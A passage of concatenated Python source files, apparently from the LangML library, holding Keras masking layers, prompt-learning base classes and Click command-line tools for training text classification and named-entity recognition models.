def compute_mask(self, inputs: Tensors, mask: Optional[Tensors] = None) -> Tensors:
if isinstance(mask, list):
return mask[0]
return mask
def call(self, inputs: Tensors, mask: Optional[Tensors] = None, **kwargs) -> Tensors:
inputs, embeddings = inputs
output = K.dot(inputs, K.transpose(embeddings))
if self.use_bias:
output = K.bias_add(output, self.bias)
return K.softmax(output)
@staticmethod
def get_custom_objects() -> dict:
return {'EmbeddingMatching': EmbeddingMatching}
def compute_output_shape(self, input_shape: Tensors) -> Tensors:
return input_shape[0][:2] + (input_shape[1][0], )
class Masked(L.Layer):
"""Generate output mask based on the given mask.
https://arxiv.org/pdf/1810.04805.pdf
"""
def __init__(self,
return_masked: bool = False,
**kwargs):
super(Masked, self).__init__(**kwargs)
self.supports_masking = True
self.return_masked = return_masked
@staticmethod
def get_custom_objects() -> dict:
return {'Masked': Masked}
def get_config(self) -> dict:
config = {
'return_masked': self.return_masked,
}
base_config = super(Masked, self).get_config()
return dict(base_config, **config)
def compute_mask(self,
inputs: Tensors,
mask: Optional[Tensors] = None) -> Union[List[Union[Tensors, None]], Tensors]:
token_mask = K.not_equal(inputs[1], 0)
masked = K.all(K.stack([token_mask, mask[0]], axis=0), axis=0)
if self.return_masked:
return [masked, None]
return masked
def call(self, inputs: Tensors, mask: Optional[Tensors] = None, **kwargs) -> Tensors:
output = inputs[0] + 0
if self.return_masked:
return [output, K.cast(self.compute_mask(inputs, mask)[0], K.floatx())]
return output
def compute_output_shape(self, input_shape: Tensors) -> Union[List[Tensors], Tensors]:
if self.return_masked:
return [input_shape[0], (2, ) + input_shape[1]]
return input_shape[0]
```
#### File: langml/prompt/base.py
```python
from abc import ABCMeta, abstractmethod
from typing import Dict, List
from langml.tensor_typing import Models
from langml.tokenizer import Tokenizer
from langml.plm import load_albert, load_bert
from langml.log import info
class Template:
def __init__(self, template: List[str], label_tokens_map: Dict[str, List[str]], tokenizer: Tokenizer) -> None:
self.tokenizer = tokenizer
self.unk_id = self.tokenizer.token_to_id(self.tokenizer.special_tokens.UNK)
self.template_ids = self.encode_template(template)
self.label2tokens, self.id2label = self.encode_label_tokens_map(label_tokens_map)
info(f'template ids: {self.template_ids}')
def __len__(self) -> int:
return len(self.template_ids)
def encode_template(self, template: str) -> List[int]:
return [self.tokenizer.token_to_id(token) for token in template]
def encode_label_tokens_map(self, label_tokens_map: Dict[str, List[str]]) -> Dict[str, List[int]]:
label2ids, id2label = {}, {}
for label, tokens in label_tokens_map.items():
token_ids = []
for token in tokens:
token_id = self.tokenizer.token_to_id(token)
assert token_id != self.unk_id, f'unknown token {token}! please specify a token from vocabulary'
token_ids.append(token_id)
id2label[token_id] = label
label2ids[label] = token_ids
return label2ids, id2label
def decode_label(self, idx: int, default='<UNK>') -> str:
return self.id2label.get(idx, default)
class BasePromptModel(metaclass=ABCMeta):
def __init__(self,
plm_backbone: str,
plm_config_path: str,
plm_ckpt_path: str,
template: Template,
learning_rate: float = 1e-5,
freeze_plm: bool = True) -> None:
""" Initialize Prompt Model
Args:
- plm_backbone: str, backbone of pretrained language model
- plm_config_path: str, configure path of pretrained language model
- plm_ckpt_path: str, checkpoint path of pretrained language model
- template: List[str], template
- label_tokens_map: str, verbalizer, map of label to tokens
- tokenizer: langml.Tokenizer, tokenizer
- learning_rate: float, learning rate
- freeze_plm: bool, whether to freeze pretrained language model weights
"""
self.model = None
self.freeze_plm = freeze_plm
if plm_backbone == 'albert':
_, self.plm, self.lazy_restore_callback = load_albert(
config_path=plm_config_path,
checkpoint_path=plm_ckpt_path,
pretraining=True,
with_mlm=True,
with_nsp=False,
lazy_restore=True)
else:
_, self.plm, self.lazy_restore_callback = load_bert(
config_path=plm_config_path,
checkpoint_path=plm_ckpt_path,
pretraining=True,
with_mlm=True,
with_nsp=False,
lazy_restore=True)
self.template = template
self.learning_rate = learning_rate
@abstractmethod
def build_model(self) -> Models:
raise NotImplementedError
class BasePromptTask(metaclass=ABCMeta):
def __init__(self, prompt_model: BasePromptModel, tokenizer: Tokenizer) -> None:
self.prompt_model = prompt_model
self.template = prompt_model.template
self.tokenizer = tokenizer
self.mask_id = self.tokenizer.token_to_id(self.tokenizer.special_tokens.MASK)
self.model = self.prompt_model.build_model()
@abstractmethod
def fit(self):
raise NotImplementedError
@abstractmethod
def predict(self):
raise NotImplementedError
class BaseDataGenerator(metaclass=ABCMeta):
@abstractmethod
def make_iter(self, random: bool = False):
raise NotImplementedError
@abstractmethod
def __len__(self):
raise NotImplementedError
def __call__(self, random: bool = False):
while True:
for inputs, labels in self.make_iter(random=random):
yield inputs, labels
```
#### File: prompt/clf/utils.py
```python
from typing import List, Optional, Tuple
import numpy as np
from boltons.iterutils import chunked_iter
from sklearn.metrics import classification_report, f1_score
from langml import keras, TF_KERAS
from langml.prompt.base import Template
def merge_template_tokens(
template_ids: List[int],
token_ids: List[int],
max_length: Optional[int] = None
) -> Tuple[List[int], List[int]]:
""" Merge template and token ids
Args:
- template_ids: List[int], template ids
- token_ids: List[int], token ids
- max_length: int, max length
Return:
- token_ids: List[int], merged token ids
- template_mask: List[int], template mask
"""
token_ids = [token_ids[0]] + template_ids + token_ids[1:-1]
if max_length:
token_ids = token_ids[:max_length - 1] + [token_ids[-1]]
template_mask = [0] + [1] * len(template_ids) + [0] * (len(token_ids) - len(template_ids) - 1)
return token_ids, template_mask
class MetricsCallback(keras.callbacks.Callback):
def __init__(self,
data: List[str],
labels: List[str],
mask_id: int,
template: Template,
patience: int = 10,
batch_size: int = 32,
model_path: Optional[str] = None,
f1_average: str = 'macro'):
self.data = data
self.labels = labels
self.mask_id = mask_id
self.template = template
self.patience = patience
self.batch_size = batch_size
self.model_path = model_path
self.f1_average = f1_average
def on_train_begin(self, logs=None):
self.step = 0
self.wait = 0
self.stopped_epoch = 0
self.warmup_epochs = 2
self.best_f1 = float('-inf')
def on_epoch_end(self, epoch, logs=None):
pred_labels = []
for chunk in chunked_iter(self.data, self.batch_size):
batch_templates, batch_tokens, batch_segments, batch_mask_ids = [], [], [], []
for obj in chunk:
batch_templates.append(obj['template_mask'])
batch_tokens.append(obj['token_ids'])
batch_segments.append(obj['segment_ids'])
batch_mask_ids.append(obj['mask_ids'])
batch_templates = keras.preprocessing.sequence.pad_sequences(
batch_templates, truncating='post', padding='post')
batch_tokens = keras.preprocessing.sequence.pad_sequences(
batch_tokens, truncating='post', padding='post')
batch_segments = keras.preprocessing.sequence.pad_sequences(
batch_segments, truncating='post', padding='post')
batch_mask_ids = keras.preprocessing.sequence.pad_sequences(
batch_mask_ids, truncating='post', padding='post')
if TF_KERAS:
logits = self.model([batch_templates, batch_tokens, batch_segments, batch_mask_ids])
else:
logits = self.model.predict([batch_templates, batch_tokens, batch_segments, batch_mask_ids])
output = np.argmax(logits[0], axis=1)
output = output * (batch_tokens == self.mask_id).astype('int')
output = output[output > 0].tolist()
pred_labels += [self.template.decode_label(idx) for idx in output]
assert len(self.labels) == len(pred_labels)
print(classification_report(self.labels, pred_labels))
f1 = f1_score(self.labels, pred_labels, average=self.f1_average)
if f1 > self.best_f1:
self.best_f1 = f1
self.wait = 0
if self.model_path is not None:
print(f'new best model, save weights to {self.model_path}')
self.model.save_weights(self.model_path)
else:
self.wait += 1
if self.wait >= self.patience:
self.stopped_epoch = epoch
self.model.stop_training = True
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
print('Epoch %05d: early stopping' % (self.stopped_epoch + 1))
``` |
{
"source": "4AI/TDEER",
"score": 2
} |
#### File: baselines/clf/cli.py
```python
import os
import json
from typing import Optional
from shutil import copyfile
import click
from langml import TF_VERSION, TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
else:
import keras
import keras.backend as K
from langml.log import info
from langml.baselines import Parameters
from langml.baselines.clf import Infer, compute_detail_metrics
from langml.baselines.clf.dataloader import load_data, DataGenerator, TFDataGenerator
from langml.model import save_frozen
from langml.tokenizer import WPTokenizer, SPTokenizer
MONITOR = 'val_accuracy' if not TF_KERAS or TF_VERSION > 1 else 'val_acc'
@click.group()
def clf():
"""classification command line tools"""
pass
@clf.command()
@click.option('--backbone', type=str, default='bert',
help='specify backbone: bert | roberta | albert')
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=2e-5, help='learning rate')
@click.option('--max_len', type=int, default=512, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--config_path', type=str, required=True, help='bert config path')
@click.option('--ckpt_path', type=str, required=True, help='bert checkpoint path')
@click.option('--vocab_path', type=str, required=True, help='bert vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def bert(backbone: str, epoch: int, batch_size: int, learning_rate: float, max_len: Optional[int],
lowercase: bool, tokenizer_type: Optional[str], early_stop: int, use_micro: bool,
config_path: str, ckpt_path: str, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'Please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.bert import Bert
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model(lazy_restore=True)
else:
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model()
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
info('done to training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=True)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@clf.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--filter_size', type=int, default=100, help='filter size of convolution')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def textcnn(epoch: int, batch_size: int, learning_rate: float, embedding_size: int,
filter_size: int, max_len: Optional[int], lowercase: bool, tokenizer_type: Optional[str],
early_stop: int, use_micro: bool, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.textcnn import TextCNN
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'filter_size': filter_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = TextCNN(params).build_model()
else:
model = TextCNN(params).build_model()
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = TextCNN(params).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
info('done to training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=False)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@clf.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--hidden_size', type=int, default=128, help='hidden size of lstm')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--with_attention', is_flag=True, default=False, help='apply bilstm attention')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def bilstm(epoch: int, batch_size: int, learning_rate: float, embedding_size: int,
hidden_size: int, max_len: Optional[int], lowercase: bool, tokenizer_type: Optional[str],
early_stop: int, use_micro: bool, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, with_attention: bool, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.bilstm import BiLSTM as BiLSTM
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'hidden_size': hidden_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = BiLSTM(params).build_model(with_attention=with_attention)
else:
model = BiLSTM(params).build_model(with_attention=with_attention)
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = BiLSTM(params).build_model(with_attention=with_attention)
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
info('done to training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=False)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
```
#### File: baselines/ner/cli.py
```python
import os
import json
from typing import Optional
from shutil import copyfile
from langml import TF_KERAS, TF_VERSION
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
else:
import keras
import keras.backend as K
import click
from langml.log import info
from langml.tokenizer import WPTokenizer, SPTokenizer
from langml.baselines import Parameters
from langml.baselines.ner import report_detail_metrics
from langml.baselines.ner.dataloader import load_data, DataGenerator, TFDataGenerator
from langml.model import save_frozen
@click.group()
def ner():
"""ner command line tools"""
pass
@ner.command()
@click.option('--backbone', type=str, default='bert',
help='specify backbone: bert | roberta | albert')
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=2e-5, help='learning rate')
@click.option('--dropout_rate', type=float, default=0.2, help='dropout rate')
@click.option('--max_len', type=int, default=512, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--config_path', type=str, required=True, help='bert config path')
@click.option('--ckpt_path', type=str, required=True, help='bert checkpoint path')
@click.option('--vocab_path', type=str, required=True, help='bert vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
def bert_crf(backbone: str, epoch: int, batch_size: int, learning_rate: float,
dropout_rate: float, max_len: Optional[int], lowercase: bool,
tokenizer_type: Optional[str], config_path: str, ckpt_path: str,
vocab_path: str, train_path: str, dev_path: str, test_path: str,
save_dir: str, early_stop: int, distribute: bool, verbose: int):
from langml.baselines.ner.bert_crf import BertCRF
# check distribute
if distribute:
assert TF_KERAS, 'Please `export TF_KERAS=1` to support distributed training!'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'dropout_rate': dropout_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = BertCRF(config_path, ckpt_path, params, backbone=backbone).build_model(lazy_restore=True)
else:
model = BertCRF(config_path, ckpt_path, params, backbone=backbone).build_model()
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
dev_generator = TFDataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
early_stop_callback = keras.callbacks.EarlyStopping(
monitor='val_viterbi_accuracy',
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor='val_viterbi_accuracy',
mode='auto')
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
validation_data=dev_dataset,
validation_steps=len(dev_generator),
verbose=verbose,
epochs=epoch,
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = BertCRF(config_path, ckpt_path, params, backbone=backbone).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
info('done to training! start to compute detail metrics...')
print('develop metrics:')
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
report_detail_metrics(model, dev_generator.datas, id2label, is_bert=True)
if test_datas:
print('test metrics:')
test_generator = DataGenerator(test_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
report_detail_metrics(model, test_generator.datas, id2label, is_bert=True)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@ner.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--dropout_rate', type=float, default=0.2, help='dropout rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--hidden_size', type=int, default=128, help='hidden size')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
